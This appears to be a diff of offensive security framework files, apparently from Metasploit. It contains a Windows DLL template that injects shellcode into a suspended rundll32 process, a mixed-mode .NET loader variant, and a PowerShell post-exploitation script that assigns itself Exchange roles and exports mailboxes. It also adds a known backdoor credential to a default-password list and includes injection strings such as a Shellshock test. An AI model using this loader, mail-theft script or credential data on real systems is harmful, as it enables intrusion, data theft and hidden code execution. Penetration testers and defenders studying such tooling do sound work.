+                body = u" File uploaded successfully."
+                start_response(
+                    '200 OK',
+                    [
+                        ('Content-type', 'text/html; charset=utf8'),
+                        ('Content-Length', str(len(body))),
+                    ]
+                )
+                return [body.encode('utf8')]
+
+        except Exception as e:
+            logger.error("Exception {}".format(str(e)))
+            body = u"Exception {}".format(str(e))
+    elif environ['REQUEST_METHOD'] == 'OPTIONS':
+        PAYLOAD
+        body = u"Invalid request"
+    else:
+        logger.error("Invalid request")
+        body = u"Invalid request"
+
+    start_response(
+        '400 fail',
+        [
+            ('Content-type', 'text/html; charset=utf8'),
+            ('Content-Length', str(len(body))),
+        ]
+    )
+    return [body.encode('utf8')]
@@ -0,0 +1,60 @@
+%clr
+*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*
+*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*
+*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*
+*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*
+*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*
+*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*
+*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*
+*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*
+*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*norbot*Delta Squad Zero*Mukesh*
+*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*
+*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*
+*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*
+*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*
+*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*
+*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*
+*B0NG0R3*                                                                                    *Les Cadets Rouges*buf*
+*Les Tontons Fl4gueurs*                                                                      *404 : Flag Not Found*
+*' UNION SELECT 'password*  %bld%red    _________                __                         %clr         *OCD247*Sparkle Pony* 
+*burner_herz0g*             %bld%red    \_   ___ \_____  _______/  |_ __ _________   ____   %clr         *Kill$hot*ConEmu*
+*here_there_be_trolls*      %bld%red    /    \  \/\__  \ \____ \   __\  |  \_  __ \_/ __ \  %clr         *;echo"hacked"*
+*r4t5_*6rung4nd4*NYUSEC*    %bld%red    \     \____/ __ \|  |_> >  | |  |  /|  | \/\  ___/  %clr         *karamel4e*
+*IkastenIO*TWC*balkansec*   %bld%red     \______  (____  /   __/|__| |____/ |__|    \___  > %clr         *cybersecurity.li*
+*TofuEelRoll*Trash Pandas*  %bld%red            \/     \/|__|                           \/  %clr         *OneManArmy*cyb3r_w1z4rd5*
+*Astra*Got Schwartz?*tmux*  %bld%red                ___________.__                          %clr         *AreYouStuck*Mr.Robot.0*
+*\nls*Juicy white peach*    %bld%red                \__    ___/|  |__   ____                %clr         *EPITA Rennes*
+*HackerKnights*             %bld%red                  |    |   |  |  \_/ __ \               %clr         *guildOfGengar*Titans*
+*Pentest Rangers*           %bld%red                  |    |   |   Y  \  ___/               %clr         *The Libbyrators*
+*placeholder name*bitup*    %bld%red                  |____|   |___|  /\___  >              %clr         *JeffTadashi*Mikeal*
+*UCASers*onotch*            %bld%red                                \/     \/               %clr         *ky_dong_day_song*
+*NeNiNuMmOk*                %bld%red              ___________.__                            %clr         *JustForFun!*
+*Maux de tête*LalaNG*       %bld%red              \_   _____/|  | _____     ____            %clr         *g3tsh3Lls0on*
+*crr0tz*z3r0p0rn*clueless*  %bld%red               |    __)  |  | \__  \   / ___\           %clr         *Phở Đặc Biệt*Paradox*
+*HackWara*                  %bld%red               |     \   |  |__/ __ \_/ /_/  >          %clr         *KaRIPux*inf0sec*
+*Kugelschreibertester*      %bld%red               \___  /   |____(____  /\___  /           %clr         *bluehens*Antoine77*
+*icemasters*                %bld%red                   \/              \//_____/            %clr         *genxy*TRADE_NAMES*
+*Spartan's Ravens*          %bld%red             _______________   _______________          %clr         *BadByte*fontwang_tw*
+*g0ldd1gg3rs*pappo*         %bld%red            \_____  \   _  \  \_____  \   _  \          %clr         *ghoti*
+*Les CRACKS*c0dingRabbits*  %bld%red             /  ____/  /_\  \  /  ____/  /_\  \         %clr         *LinuxRiders*   
+*2Cr4Sh*RecycleBin*         %bld%red            /       \  \_/   \/       \  \_/   \        %clr         *Jalan Durian*
+*ExploitStudio*             %bld%red            \_______ \_____  /\_______ \_____  /        %clr         *WPICSC*logaritm*
+*Car RamRod*0x41414141*     %bld%red                    \/     \/         \/     \/         %clr         *Orv1ll3*team-fm4dd*
+*Björkson*FlyingCircus*                                                                      *PwnHub*H4X0R*Yanee*
+*Securifera*hot cocoa*                                                                       *Et3rnal*PelarianCP*
+*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*
+*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*
+*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*
+*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*
+*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*
+*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*
+*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*
+*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_noob*Ferris Wheel*Ficus*ONO*jameless*
+*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*
+*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*
+*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*
+*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*
+*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*
+*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*
+*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*
+
@@ -0,0 +1,2 @@
+HostingCLR*
+!HostCLR*.dll
@@ -0,0 +1,207 @@
+# Wrapper around Write-Host, but surrounds the string with delimiters so that we can disregard spam output originating from RemoteExchange scripts
+function Write-Output ( [string] $string ) {
+    $string = [string]::join("<br>",($string.Split("`r`n")))
+    # <output> is a placeholder delimiter, it is later replaced by the Ruby script
+    Write-Host "<output>$string</output>"
+}
+
+function Export-Mailboxes ([string] $mailbox, [string] $filter, [string] $path) {
+    # $path may arrive as a short path (C:\Users\ADMINI~1\...), but Exchange does not accept short paths.
+    # Get-Item is used to translate the short path to a full path.
+    $path_parent = Split-Path -Path $path -Parent
+    $path_leaf = Split-Path -Path $path -Leaf
+    $path_parent_full = (Get-Item -LiteralPath $path_parent).FullName
+    $path_full = Join-Path $path_parent_full $path_leaf
+
+    # Convert path to a UNC path
+    $path_drive = (Split-Path -Path $path_full -Qualifier)[0]
+    $path_rest = Split-Path -Path $path_full -NoQualifier
+    $unc_path = '\\localhost\' + $path_drive + '$' + $path_rest
+
+    Write-Output "Exporting mailbox..."
+
+    try {
+        if ($filter -eq "") {
+            # Don't use a filter
+            $export_req = New-MailboxExportRequest -Priority High -Mailbox $mailbox -FilePath $unc_path
+        } else {
+            # Use a filter
+            $export_req = New-MailboxExportRequest -Priority High -ContentFilter $filter -Mailbox $mailbox -FilePath $unc_path
+        }
+    }
+    catch {
+        $EM = $_.Exception.Message
+        Write-Output "Error exporting mailbox - New-MailboxExportRequest failed"
+        Write-Output "Exception message: '$EM'"
+        return
+    }
+
+    if ($export_req -eq $null) {
+        Write-Output "Error exporting mailbox - New-MailboxExportRequest returned null"
+        return
+    }
+
+    # Monitor the export job status
+    While ($true) {
+        $req_status = $export_req | Get-MailboxExportRequest
+        
+        Write-Output ". $($req_status.Status)"
+
+        if ($req_status.Status -eq "Failed") {
+            Write-Output "Error exporting mailbox - Export job failed"
+            break
+        }
+
+        if ($req_status.Status -eq "Completed") {
+            Write-Output "Exporting done"
+            break
+        }
+
+        Start-Sleep -Seconds 1
+    }
+
+    $export_req | Remove-MailboxExportRequest -Confirm:$false
+}
+
+function List-Mailboxes {
+    # Don't throw exceptions when errors are encountered
+    $Global:ErrorActionPreference = "Continue"
+
+    $servers = Get-MailboxServer
+    foreach ($server in $servers) {
+        Write-Output "----------"
+        Write-Output "Server:"
+        Write-Output "- Name: $($server.Name)"
+        Write-Output "- Version: $($server.AdminDisplayVersion)"
+        Write-Output "- Role: $($server.ServerRole)"
+        Write-Output "-----"
+        Write-Output "Mailboxes:"
+        $mailboxes = Get-Mailbox -Server $server
+        foreach ($mailbox in $mailboxes) {
+            Write-Output "---"
+            Write-Output "- Display Name: $($mailbox.DisplayName)"
+            Write-Output "- Email Addresses: $($mailbox.EmailAddresses)"
+            Write-Output "- Creation date: $($mailbox.WhenMailboxCreated)"
+            Write-Output "- Address list membership: $($mailbox.AddressListMembership)"
+
+            $folderstats = $mailbox | Get-MailboxFolderStatistics -IncludeOldestAndNewestItems -IncludeAnalysis
+            if ($folderstats) {
+                $non_empty_folders = ( $folderstats | ? {$_.ItemsInFolder -gt 0 })
+                if (!($non_empty_folders)) {
+                    Write-Output "- (All folders are empty)"
+                } else {
+                    Write-Output "- Folders:"
+                    foreach ($folderstats in $non_empty_folders) {
+                        $output_string = "-- Path $($folderstats.FolderPath), Items $($folderstats.ItemsInFolder), Size $($folderstats.FolderSize)"
+                        if ($folderstats.NewestItemReceivedDate) {
+                            $output_string += ", Newest received date $($folderstats.NewestItemReceivedDate)"
+                        }
+                        Write-Output "$output_string"
+                    }
+                }
+            }
+        }
+    }
+}
+
+function Ensure-Role ([string] $user, [string] $role) {
+    $assignments = Get-ManagementRoleAssignment -Role $role -RoleAssignee $user -Delegating $false
+    if (!($assignments)) {
+        Write-Output "User not assigned to role $role - Assigning now"
+        New-ManagementRoleAssignment -Role $role -User $user
+    }
+}
+
+function Check-Permission {
+    try {
+        $Current_Identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
+        $Groups = Get-ADPrincipalGroupMembership -identity $Current_Identity.User
+    } 
+    catch {
+        $EM = $_.Exception.Message
+        Write-Output "Error getting the current user's Active Directory group membership"
+        Write-Output "Exception message: '$EM'"
+        return $false
+    }
+
+    return [bool] ( $Groups | ? {$_.samAccountName -eq "Organization Management" })
+}
+
+function Assign-Roles {
+    $Current_Username = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
+
+    # Ensure the current user has the following roles, required for the New-MailboxExportRequest cmdlet
+    Ensure-Role $Current_Username "Mailbox Search"
+    Ensure-Role $Current_Username "Mailbox Import Export"
+}
+
+function Get-RemoteExchangePath {
+    # Get the path of the RemoteExchange.ps1 script
+    $Path = $env:ExchangeInstallPath
+    if (!$Path -Or !(Test-Path $Path)) {
+        $Path = Join-Path $env:ProgramFiles 'Microsoft\Exchange Server\V15\'
+        if (!(Test-Path $Path)) {
+            $Path = Join-Path $env:ProgramFiles 'Microsoft\Exchange Server\V14\'
+            if (!(Test-Path $Path)) {
+                return $null
+            }
+        }
+    }
+
+    $RemoteExchangePath = Join-Path $Path 'Bin\RemoteExchange.ps1'
+    if (!(Test-Path $RemoteExchangePath)) {
+        return $null
+    }
+
+    return $RemoteExchangePath
+}
+
+# Need to set this in order to catch errors raised by RemoteExchange as exceptions
+$Global:ErrorActionPreference = "Stop"
+
+$RemoteExchangePath = Get-RemoteExchangePath
+if (!($RemoteExchangePath)) {
+    Write-Output "Couldn't find RemoteExchange PowerShell script"
+    return
+}
+
+try {
+    Import-Module $RemoteExchangePath
+} 
+catch {
+    $EM = $_.Exception.Message
+    Write-Output "Error loading the RemoteExchange PowerShell script" 
+    Write-Output "Exception message: '$EM'"
+    return
+}
+
+try {
+    Connect-ExchangeServer -auto
+}
+catch {
+    $EM = $_.Exception.Message
+    Write-Output "Error connecting to Exchange server"
+    Write-Output "Exception message: '$EM'"
+    return
+}
+
+try {
+    # There's a bug in Exchange 2010 that requires running an Exchange cmdlet before an AD cmdlet, otherwise the script won't work.
+    # For this reason, we run Get-Mailbox here and disregard its output.
+    Get-Mailbox | Out-Null
+
+    if (!(Check-Permission)) {
+        Write-Output "Permission check failed, current user must be assigned to the Organization Management role group"
+        return
+    }
+
+    _COMMAND_
+}
+catch [System.Management.Automation.CommandNotFoundException] {
+    Write-Output "A CommandNotFoundException was thrown - Some Exchange Management Shell are unavailable. This is most likely due to insufficient credentials in meterpreter session"
+}
+catch {
+    $EM = $_.Exception.Message
+    Write-Output "Aborting, caught an exception"
+    Write-Output "Exception message: '$EM'"
+}
@@ -0,0 +1,14 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj
+move *.dll ..\..\..
+
@@ -1,24 +0,0 @@
-#
-# XXX: NOTE: this will only compile the x86 version.
-#
-# To compile the x64 version, use:
-# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
-# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
-#
-
-if [ -z "$PREFIX" ]; then
-  PREFIX=i586-mingw32msvc
-fi
-
-rm -f *.o *.dll
-$PREFIX-gcc -c template.c
-$PREFIX-windres -o rc.o template.rc
-$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
-rm -f junk.tmp
-$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp --def template.def
-rm -f base.tmp
-$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
-rm -f temp.exp
-
-$PREFIX-strip template_x86_windows.dll
-rm -f *.o
@@ -5,11 +5,10 @@
 /* hand-rolled bzero allows us to avoid including ms vc runtime */
 void inline_bzero(void *p, size_t l)
 {
-   
-           BYTE *q = (BYTE *)p;
-           size_t x = 0;
-           for (x = 0; x < l; x++)
-                     *(q++) = 0x00;
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
 }

 #endif
@@ -20,82 +19,119 @@ void ExecutePayload(void);
 BOOL WINAPI
 DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
 {
-    switch (dwReason)
-    {
-        case DLL_PROCESS_ATTACH:
+	switch (dwReason)
+	{
+		case DLL_PROCESS_ATTACH:
 			ExecutePayload();
-            break;
+			break;

-        case DLL_PROCESS_DETACH:
-            // Code to run when the DLL is freed
-            break;
+		case DLL_PROCESS_DETACH:
+			// Code to run when the DLL is freed
+			break;

-        case DLL_THREAD_ATTACH:
-            // Code to run when a thread is created during the DLL's lifetime
-            break;
+		case DLL_THREAD_ATTACH:
+			// Code to run when a thread is created during the DLL's lifetime
+			break;

-        case DLL_THREAD_DETACH:
-            // Code to run when a thread ends normally.
-            break;
-    }
-    return TRUE;
+		case DLL_THREAD_DETACH:
+			// Code to run when a thread ends normally.
+			break;
+	}
+	return TRUE;
+}
+
+// Use a combination semaphore / event to check if the payload is already running and when it is, don't start a new
+// instance. This is to fix situations where the DLL is loaded multiple times into a host process and prevents the
+// payload from being executed multiple times. An event object is used to determine if the payload is currently running
+// in a child process. The event handle is created by this process (the parent) and configured to be inherited by the
+// child. While the child process is running, the event handle can be successfully opened. When the child process exits,
+// the event handle that was inherited from the parent will be automatically closed and subsequent calls to open it will
+// fail. This indicates that the payload is no longer running and a new instance can be created.
+BOOL Synchronize(void) {
+	BOOL bResult = TRUE;
+	BOOL bRelease = FALSE;
+	HANDLE hSemaphore = NULL;
+	HANDLE hEvent = NULL;
+	SECURITY_ATTRIBUTES SecurityAttributes;
+
+	// step 1: define security attributes that permit handle inheritance
+	SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
+	SecurityAttributes.lpSecurityDescriptor = NULL;
+	SecurityAttributes.bInheritHandle = TRUE;
+
+	do {
+		// step 2: create a semaphore to synchronize this routine
+		if ((hSemaphore = CreateSemaphoreA(&SecurityAttributes, 1, 1, szSyncNameS)) == NULL) {
+			// if the semaphore creation fails, break out using the default TRUE result, this shouldn't happen
+			break;
+		}
+
+		bResult = FALSE;
+		// step 3: acquire the semaphore, if the operation timesout another instance is already running so exit
+		if (WaitForSingleObject(hSemaphore, 0) == WAIT_TIMEOUT) {
+			break;
+		}
+		bRelease = TRUE;
+
+		// step 4: check if the event already exists
+		if (hEvent = OpenEventA(READ_CONTROL | SYNCHRONIZE, TRUE, szSyncNameE)) {
+			// if the event already exists, do not continue
+			CloseHandle(hEvent);
+			break;
+		}
+
+		// step 5: if the event does not already exist, create a new one that will be inherited by the child process
+		if (hEvent = CreateEventA(&SecurityAttributes, TRUE, TRUE, szSyncNameE)) {
+			bResult = TRUE;
+		}
+	} while (FALSE);
+
+
+	// step 6: release and close the semaphore as necessary
+	if (hSemaphore) {
+		if (bRelease) {
+			ReleaseSemaphore(hSemaphore, 1, NULL);
+		}
+		CloseHandle(hSemaphore);
+	}
+	// *do not* close the event handle (hEvent), it needs to be inherited by the child process
+	return bResult;
 }

 void ExecutePayload(void) {
-    int error;
+	int error;
 	PROCESS_INFORMATION pi;
 	STARTUPINFO si;
 	CONTEXT ctx;
 	DWORD prot;
-   LPVOID ep;
+	LPVOID ep;

 	// Start up the payload in a new process
 	inline_bzero( &si, sizeof( si ));
 	si.cb = sizeof(si);

-	// Create a suspended process, write shellcode into stack, make stack RWX, resume it
-	if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
-		ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
-		GetThreadContext(pi.hThread, &ctx);
+	if (Synchronize()) {
+		// Create a suspended process, write shellcode into stack, make stack RWX, resume it
+		if (CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
+			ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
+			GetThreadContext(pi.hThread, &ctx);

-	   ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+			ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

-        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
+			WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);

-#ifdef _WIN64
-	   ctx.Rip = (DWORD64)ep;
-#else
-	   ctx.Eip = (DWORD)ep;
-#endif
+	#ifdef _WIN64
+			ctx.Rip = (DWORD64)ep;
+	#else
+			ctx.Eip = (DWORD)ep;
+	#endif

-        SetThreadContext(pi.hThread,&ctx);
+			SetThreadContext(pi.hThread,&ctx);

-        ResumeThread(pi.hThread);
-        CloseHandle(pi.hThread);
-        CloseHandle(pi.hProcess);
+			ResumeThread(pi.hThread);
+			CloseHandle(pi.hThread);
+			CloseHandle(pi.hProcess);
+		}
 	}
-   // ExitProcess(0);
-   ExitThread(0);
+	ExitThread(0);
 }
-
-/*
-typedef VOID
-(NTAPI *PIMAGE_TLS_CALLBACK) (
-    PVOID DllHandle,
-    ULONG Reason,
-    PVOID Reserved
-    );
-
-VOID NTAPI TlsCallback(
-      IN PVOID DllHandle,
-      IN ULONG Reason,
-      IN PVOID Reserved)
-{
-	__asm  ( "int3" );
-}
-
-ULONG _tls_index;
-PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
-IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
-*/
-
@@ -1,3 +0,0 @@
-EXPORTS
-DllMain@12
-
@@ -1,4 +1,5 @@

-#define SCSIZE 2048
+#define SCSIZE 4096
 unsigned char code[SCSIZE] = "PAYLOAD:";
-
+char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
+char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
@@ -0,0 +1,23 @@
+# DLL Mixed Mode
+This is a [Mixed Mode Assembly][1], it allows a native payload from Metasploit
+to be executed from within what is the bare minimum requirements of a valid .NET
+assembly. The DLL source code is the same as the [standard DLL][2] template, the
+primary difference from a file perspective is that this DLL has the necessary
+manifest information to be loaded as a managed assembly.
+
+## Building
+Use the provided `build.bat` file, and run it from within the Visual Studio
+developer console. The batch file requires that the `%VCINSTALLDIR%` environment
+variable be defined (which it should be by default). The build script will
+create both the x86 and x64 templates before moving them into the correct
+folder. The current working directory when the build is run must be the source
+code directory (`dll_mixed_mode`).
+
+## References
+
+* https://github.com/bao7uo/MixedUp
+* https://thewover.github.io/Mixed-Assemblies/
+
+
+[1]: https://docs.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=vs-2019
+[2]: https://github.com/rapid7/metasploit-framework/tree/master/data/templates/src/pe/dlli
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj
+move *.dll ..\..\..
@@ -0,0 +1,2 @@
+#pragma unmanaged
+#include "template.c"
@@ -505,3 +505,4 @@ wradmin trancell
 write private
 xd xd
 xxx cascade
+zyfwp PrOw!aN_fXp
@@ -0,0 +1,100 @@
+# last updated 2020-10-07
+# see: https://www.telerik.com/support/whats-new/aspnet-ajax/release-history
+2020.3.915
+2020.2.617
+2020.2.512
+2020.1.219
+2020.1.114
+2019.3.1023
+2019.3.917
+2019.2.514
+2019.1.215
+2019.1.115
+2018.3.910
+2018.2.710
+2018.2.516
+2018.1.117
+2015.2.623
+2014.1.403
+2017.3.913
+2017.2.711
+2017.2.621
+2017.2.503
+2017.1.228
+2017.1.118
+2016.3.1027
+2016.3.1018
+2016.3.914
+2016.2.607
+2016.2.504
+2016.1.225
+2016.1.113
+2015.3.1111
+2015.3.930
+2015.2.826
+2015.2.729
+2015.2.604
+2015.1.225
+2015.1.204
+2014.3.1024
+2014.2.724
+2014.2.618
+2014.1.225
+2013.3.1324
+2013.3.1114
+2013.3.1015
+2013.2.717
+2013.2.611
+2013.1.417
+2013.1.403
+2013.1.220
+2012.3.1308
+2012.3.1205
+2012.3.1016
+2012.2.912
+2012.2.724
+2012.2.607
+2012.1.411
+2012.1.215
+2011.3.1305
+2011.31115
+2011.2915
+2011.2712
+2011.1519
+2011.1413
+2011.1315
+2010.31317
+2010.31215
+2010.31109
+2010.2929
+2010.2826
+2010.2713
+2010.1519
+2010.1415
+2010.1309
+2009.31314
+2009.31208
+2009.31103
+2009.2826
+2009.2701
+2009.1527
+2009.1402
+2009.1311
+2008.31314
+2008.31125
+2008.31105
+2008.21001
+2008.2826
+2008.2723
+2008.1619
+2008.1515
+2008.1415
+2007.31425
+2007.31314
+2007.31218
+2007.21107
+2007.21010
+2007.2918
+2007.1626
+2007.1521
+2007.1423
@@ -20,6 +20,7 @@
 1976
 1beauty-studio
 1blogto
+1io
 1n07070
 1skyliner
 1sr_first
@@ -90,6 +91,7 @@
 8bit
 8press
 8q
+8rise
 8some
 8squares
 8templates_city_green
@@ -123,7 +125,9 @@ a-delicious-red
 a-different-blue
 a-dream-to-host
 a-dream-within
+a-gridblog
 a-kelleyroo-halloween
+a-little-bit-of-doodle
 a-little-touch-of-purple
 a-magazine
 a-new
@@ -147,16 +151,20 @@ a11yall
 a19
 a5
 aaa
+aaaaaaaa
 aaddeel
 aadi
 aadya
 aagaz-startup
+aak
 aakanksha-unique
 aakriti-personal-blog
 aakrosh
 aamla
+aanews
 aapna
 aargee
+aari
 aaron
 aaron-modified-intent
 aav1
@@ -176,6 +184,7 @@ abcmn
 abcok
 abedul
 abel-one
+abel_rad_theme
 aberdeen
 aberration-lite
 abheektheme-uri-httpcolorlib-comwpthemessparkling
@@ -183,9 +192,11 @@ abi-jackson
 abik
 ability
 abingle
+abiolian-business
 abisteel
 abitno
 able
+abletone
 ablog
 abnomize
 about-me
@@ -218,6 +229,7 @@ ac-repair
 academic
 academic-clear
 academic-education
+academic-education1
 academic-hub
 academic-lite
 academic1
@@ -269,28 +281,35 @@ ace-corporate
 ace-theme
 acer
 acer-theme
+aces
 achilles-blog
 achillestheme
 aciago
 acid-rain
 acitpo
 acme
+acme-wp
 acmeblog
 acmephoto
 acmetech
 acms
+acommerce
 acool
 acosminblogger
+acoustics
 act-child
 act-theme-lite
+actify
 actinia
 action
 actions
+activatelife
 activation
 active-pro
 active-red
 active-theme
 activeblog-lite
+activell
 activello
 activello-1
 activello-2-0theme-uri-httpscolorlib-comwpthemesactivello
@@ -323,6 +342,7 @@ adam
 adamite
 adamos
 adams-razor
+adaptable-notes
 adaptativo
 adapter
 adaption
@@ -339,8 +359,10 @@ adena
 adept
 adeq
 adformat
+adguru
 adirondack
 adisaly
+aditi
 adle
 adler
 adm
@@ -354,6 +376,7 @@ admired
 admize
 adney
 adonis
+adorable-blog
 adoration
 adri
 adrian-lite
@@ -384,8 +407,10 @@ advance-portfolio
 advance-portfolio-0-1
 advance-simple-blue
 advance-startup
+advance1-fitness-gym
 advantage
 advent
+adventeqa
 adventura
 adventure
 adventure-blog
@@ -393,6 +418,7 @@ adventure-bound-basic
 adventure-journal
 adventure-journal-21
 adventure-lite
+adventure-soul
 adventure-tours
 adventure-travel
 adventure-travelling
@@ -408,13 +434,16 @@ aeby-events-seo-writers-blogily
 aedificator
 aedificator-1-0-10
 aemi
+aemi-child
 aemon
+aeonaccess
 aeonblog
 aereo
 aerial
 aerin
 aero
 aero-inspirat
+aerobics
 aeroblog
 aeros
 aerosmanish
@@ -426,7 +455,10 @@ aestival
 afeeee
 affidavit
 affiliate-blog-writer
+affiliate-marketingly
 affiliate-newspaperly
+affiliateblogwriter
+affiliates-bloglet
 affilicious-theme
 affilistrap
 affilivice
@@ -447,15 +479,23 @@ agama-blue
 agama-blue-2-0
 agel-web
 agena
+agence
 agency
 agency-4
 agency-ecommerce
+agency-elentra
 agency-lite
+agency-maker
+agency-plus
+agency-starter
 agency-x
+agency-zita
+agencyup
 agensy
 aggiornare
 agile-spirit
 agilith
+agility-wp
 agindo
 agiva
 aglee-lite
@@ -474,6 +514,7 @@ aible
 aif
 aikon-academy
 aileron
+aino
 aionwars
 air
 air-balloon-lite
@@ -481,10 +522,12 @@ air-free
 air-light
 airey
 airi
+airi-patricia
 airi1
 airiteste
 airiwachswachs
 airmail-par-avion
+airnews
 airship
 airy
 ais-theme
@@ -494,26 +537,32 @@ aj
 ajaira
 ajaytheme
 ajna-yoga
+ak-blogs
 ak-newsdesk-lite
 akaka
 akakaa
 akangatu
 akarsh-blog
+akash
 akasse
 akella
 akhada-fitness-gym
 aki-blog
 akihabara
 akira
+akks
+akpager
 aktivitetisormland
